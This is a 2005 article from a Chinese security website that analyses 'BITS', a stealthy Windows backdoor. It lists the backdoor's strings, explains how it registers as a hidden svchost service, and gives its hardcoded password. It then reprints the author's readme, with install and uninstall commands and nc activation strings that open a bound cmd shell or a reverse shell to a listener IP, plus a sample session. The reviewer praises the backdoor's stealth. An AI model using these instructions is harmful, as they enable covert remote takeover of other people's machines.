首页 安全基础 网络安全 安全协议 病毒分析 防火墙 OS安全 无线安全 Web安全 PKI与PMI 入侵检测 经典案例
安全审计 设备安全 安全管理 安全标准 法律法规 隔离网闸 DB安全 XML安全 开源项目 资源下载 安全论坛 备份恢复
 当前位置:首页>>OS安全>>基础知识>>正文
让我们来看看BITS
文章出处:不详   发布时间:2005-06-12   点击:0
 

  先让我们来看看作者是怎样说的?

特点:
进程管理器中看不到
平时没有端口,只是在系统中充当卧底的角色
提供正向连接和反向连接两种功能
仅适用于Windows2000/XP/2003
一点一点来分析
"%systemroot%\system32\qmgr.dll"
"%SystemRoot%\System32\svchost.exe "

使用系统文件把自己注册成服务中所需的dll
很聪明:)
"@dancewithdolphin",这个好像是通用密码,没试过

下面是实际操作里所需要的东西
"[rxell]:"远程连接
"[xell]:"连接上之后
"\Parameters"相应目录
"]_^["

"BITS"
"cmd"命令行
"Enter ServiceMain"
"Enter Sniffer"打开sniffer
"GetModuleFileName() get dll path"安装之前的工作,找的安装所需的dll的目录
"Install BITS OK."安装信息
"IPRIP"
"netsvcs"
"OpenSCManager()"
"Parameters"
这下面是删除这个东东的表现
"Removed"
"ServiceDll"
在注册表里将自己这测成开机自动启动及服务
"RegCreateKey(Parameters)"
"RegQueryValueEx(Svchost\netsvcs)"
"RegSetValueEx(ServiceDll)"
"SOFTWARE\Microsoft\Windows NT\CurrentVersion\S"
"SOFTWARE\Microsoft\Windows NT\CurrentVersion\s"
"Start"
"Strings"
"SYSTEM\CurrentControlSet\Services\"
这些都是作者的信息——可靠性我有点怀疑
"www.netXeyes.com Security@vip.sina.com"
"BackDoor BITS, by netXeyes 2003.09.15"

点评:没有新意,但思路不错,代码严谨,不容易发现。
希望下一版本里的自我保护能力增强!

附:作者的readme.txt
卸载:
rundll32.exe BITS.dll,Uninstall
重启系统
通常情况下安装和卸载无论成功或者失败都不会有提示。
正向连接:
1、用nc连接目标主机的任何一个TCP端口(80/139/445.....)
2、按照以下格式输入激活命令
<Active Strings>@dancewithdolphin[xell]:<PORT>
例如,在安装的时候设定了Active Strings为BITS Door,将CMD绑定在端口99:
BITS Door@dancewithdolphin[xell]:99
这样目标主机就会将CMD绑定在99。
3、连接目标主机的指定端口(上例中为99)
反向连接:
很多情况下主机是在防火墙后面的,这样就需要用反向连接。
1、在本地使用NC监听(如:nc -l -p 1234)
2、用nc连接目标主机的任何一个防火墙允许的TCP端口(80/139/445.....)
3、按照以下格式输入激活命令
<Active Strings>@dancewithdolphin[rxell]:<Your IP>:<Listen Port>
例如,在安装的时候设定了Active Strings为BITS Door,本机地址为1.1.1.1, nc在1234
端口监听:
BITS Door@dancewithdolphin[rxell]:1.1.1.1:1234
4、目标主机的CMD将会出现在NC监听的端口1234。
注意:所有的输入都区分大小写。
Example:
C:\My Documents>nc 219.237.63.199 139
securitystrings@dancewithdolphin[xell]:7
?
C:\My Documents>nc 219.237.63.199 7
廙icrosoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>
如果没有成功,可以尝试在安装的时候使用:
rundll32.exe BITS.dll,Install rasauto <Active Strings>


 

作者:
[返回顶部↑]  [推荐好友] [查看评论]  
用户名: 新注册) 密码: 匿名评论 [查看评论]  发表评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 
↑文章搜索
  关键字:  
  范  围:  
  开始搜索  
※相关文章※
 

◎修改规则防止被入侵
◎如何关闭常见端口(113、48
◎win2000下关闭无用端口
◎服务器的安全解决方案
◎警惕默认安装的陷阱
◎WINDOWS的注册表中一共藏有
◎用DOS命令破除UNIX系统管理

 
※热点文章※
  ·Windows2000 常见问题解答
·军用计算机安全术语
·再谈进程与端口的映射
·用屏幕保护为电脑加密
·进程信息伪文件系统的一些
·一篇系统安全教学
·注册表介绍
 

关于我们 | 征搞启示 | 版权信息 | 联系我们 | 友情链接

版权所有:中国信息安全组织 © 2003-2005 Power by DedeCms